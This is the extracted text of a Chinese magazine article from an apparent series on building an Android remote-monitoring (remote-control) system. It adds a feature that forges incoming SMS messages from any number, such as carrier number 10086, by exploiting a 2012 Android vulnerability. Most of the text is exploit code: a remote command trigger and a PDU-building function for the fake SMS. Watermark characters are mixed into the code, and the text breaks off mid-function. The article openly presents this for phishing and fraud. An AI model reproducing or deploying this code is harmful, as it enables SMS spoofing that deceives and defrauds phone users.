Android远程监控系统设计之伪造短信详解.PDF

2013 年第6 期 Android 远程监控系统设计之伪造短信 文/ 图 秦妮 通过前一篇文章，大家已经基本了解了远程监控的框架，在该框架上增加功能也是比较 简单的，添加的方法分为如下几步：添加权限、判断指令、指令功能实现。 本文将介绍一个20 12 年底北卡罗莱纳州立大学蒋旭宪教授领导的团队发布的Android 系统所有版本中存在的安全漏洞，任何应用软件不需要任何权限（包括不需要读写短信的权 限）都可以在系统中伪造任意号码发来的任何内容的短信或彩信，从而可能引发进一步的钓 鱼攻击。Google 已经确认了这一漏洞的存在。 这个漏洞的效果就是当程序运行时，可以在本机上伪造任意号码任意内容的短信，在钓 鱼和诈骗中比较常见。首先按照添加功能的方法进行代码编写，第一步是添加权限，该漏洞 不需要任何权限，因此这步可省。第二步判断指令，可在源代码中添加如下代码： if(message.toLowerCase().contains(duanxin)){ createFakeSms (this.getApplicationContext(),10086,FakeSms); } 这段代码的意思是，当接收到指令“QN#duanxin”时，调用createFakeSms 函数， 会在本机伪造一条收到来自10086 的短信，短信内容是“FakeSms”。这里可将要伪造的短 信号码及内容换成自己需要的。 处 第三步，指令功能实现。这一步比较简单，因为已经有大牛写好了利用代码，我们只要 线 稍加改动就可以拿来使用了，具体代码如下： 出 防 private static void createFakeSms(Context context, String sender, String 明 body) { 客 byte[] pdu = null; 注 byte[] scBytes = PhoneNumberUtils 黑.networkPortionToCalledPartyBCD (0000000000); 请 byte[] senderBytes = PhoneNumberUtils .networkPortionToCalledPartyBCD (sender); 载 int lsmcs = scBytes.length; byte[] dateBytes = new byte[7]; Calendar calendar = new GregorianCalendar(); 转 dateBytes[0] = reverseByte ((byte) (calendar.get(Calendar.YEAR))); dateBytes[1] = reverseByte ((byte) (calendar.get(Calendar.MONTH ) + 1)); dateBytes[2] = reverseByte ((byte) (calendar.get(Calendar.DAY_OF_MONTH ))); dateBytes[3] = reverseByte ((byte) (calendar.get(Calendar.HOUR_OF_DAY ))); dateBytes[4] = reverseByte ((byt